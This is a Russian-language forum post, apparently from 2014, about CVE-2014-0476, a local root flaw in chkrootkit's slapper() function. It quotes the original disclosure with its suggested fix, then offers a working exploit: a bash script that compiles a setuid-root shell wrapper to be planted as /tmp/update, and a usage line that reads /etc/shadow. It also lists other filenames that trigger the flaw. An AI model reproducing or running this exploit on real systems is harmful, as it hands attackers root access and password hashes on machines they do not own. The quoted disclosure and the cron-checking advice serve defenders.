Показать сообщение отдельно
Старый 05.06.2014, 18:05   #1
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию CVE-2014-0476 chrootkit

chkrootkit => local root privilege escalation with exploit

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0476
http://www.openwall.com/lists/oss-security/2014/06/04/9
http://seclists.org/oss-sec/2014/q2/430

** RESERVED ** - lol

Код:
Hi,

 we just found a serious vulnerability in the chkrootkit package, which
 may allow local attackers to gain root access to a box in certain
 configurations (/tmp not mounted noexec).

 The vulnerability is located in the function slapper() in the
 shellscript chkrootkit:

 #
 # SLAPPER.{A,B,C,D} and the multi-platform variant
 #
 slapper (){
 SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"
 SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \
 ${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a
 SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "
 OPT=-an
 STATUS=0
 file_port=

 if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}">
 /dev/null 2>&1
 then
 STATUS=1
 [ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \
 $egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print $7 }' |
 tr -d :`
 fi
 for i in ${SLAPPER_FILES}; do
 if [ -f ${i} ]; then
 file_port=$file_port $i
 STATUS=1
 fi
 done
 if [ ${STATUS} -eq 1 ] ;then
 echo "Warning: Possible Slapper Worm installed ($file_port)"
 else
 if [ "${QUIET}" != "t" ]; then echo "not infected"; fi
 return ${NOT_INFECTED}
 fi
 }


 The line 'file_port=$file_port $i' will execute all files specified in
 $SLAPPER_FILES as the user chkrootkit is running (usually root), if
 $file_port is empty, because of missing quotation marks around the
 variable assignment.

 Steps to reproduce:

 - Put an executable file named 'update' with non-root owner in /tmp (not
 mounted noexec, obviously)
 - Run chkrootkit (as uid 0)

 Result: The file /tmp/update will be executed as root, thus effectively
 rooting your box, if malicious content is placed inside the file.

 If an attacker knows you are periodically running chkrootkit (like in
 cron.daily) and has write access to /tmp (not mounted noexec), he may
 easily take advantage of this.


 Suggested fix: Put quotation marks around the assignment.

 file_port="$file_port $i"


 I will also try to contact upstream, although the latest version of
 chkrootkit dates back to 2009 - will have to see, if I reach a dev there.


 Keep up the good work,

 Cheers,
 Thomas
короче, если установлен chkrootkit и /tmp смонтирован без опции noexec, то можно порутать систему,
создав файл /tmp/update (исполняемый - chmod +x /tmp/update) с нужным содержимым и дождаться, пока админ запустит chkrootkit или сам chkrootkit запустится через cron,
типа /tmp/update будет выполнено от рута

работает кстате!

Linux 2.6.38-16-generic #67-Ubuntu SMP Thu Sep 6 18:00:43 UTC 2012 i686 athlon i386 GNU/Linux

chkrootkit -V
chkrootkit version 0.49


VERIFIED

PS: все срочно лезем в /etc/crontab и проверям, что там запускается

а также проверяем:

/etc/cron.d
/etc/cron.daily
/etc/cron.hourly
/etc/cron.monthly
/etc/cron.weekly

exploit (put it in /tmp/update and chmod +x /tmp/update):

Код:
#!/bin/bash
# CVE-2014-0476 chkrootkit => local root privilege escalation
# Author: Pashkela for RDOT.ORG (05.06.2014)
# Restrictions: chkrootkit running from root (for example from CRON) and /tmp not mounted noexec
# tested on chkrootkit version 0.49 and Linux 2.6.38-16-generic #67-Ubuntu SMP Thu Sep 6 18:00:43 UTC 2012 i686 athlon i386 GNU/Linux
# check for chkrootkit: 
# /etc/crontab
# /etc/cron.d
# /etc/cron.daily
# /etc/cron.hourly
# /etc/cron.monthly
# /etc/cron.weekly
 
# path for suid file - but check it befor for not mounted noexec,nosuid
OUTPUT=/tmp
 
cat > sh.c << EOF
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
if(argc == 2) {
setgid(0); setuid(0);
system(argv[1]); }
return 0;
}
EOF
gcc sh.c -o $OUTPUT/sh
chown 0:0 $OUTPUT/sh
chmod 4777 $OUTPUT/sh
suid file /tmp/sh with root permissions will be created after chkrootkit finish work

then just:

$ /tmp/sh "id;whoami;cat /etc/shadow"

PS: you can change path /tmp to other path in exploit (but check it befor for not mounted noexec,nosuid)

check it (if you have root permissions) - just run chkrootkit

and you can use such names instead of /tmp/update:

/tmp/.unlock
/tmp/httpd
/tmp/.cinik
/tmp/.b

from 2009!

Последний раз редактировалось SynQ; 16.06.2014 в 11:15.. Причина: переименовал
Pashkela вне форума   Ответить с цитированием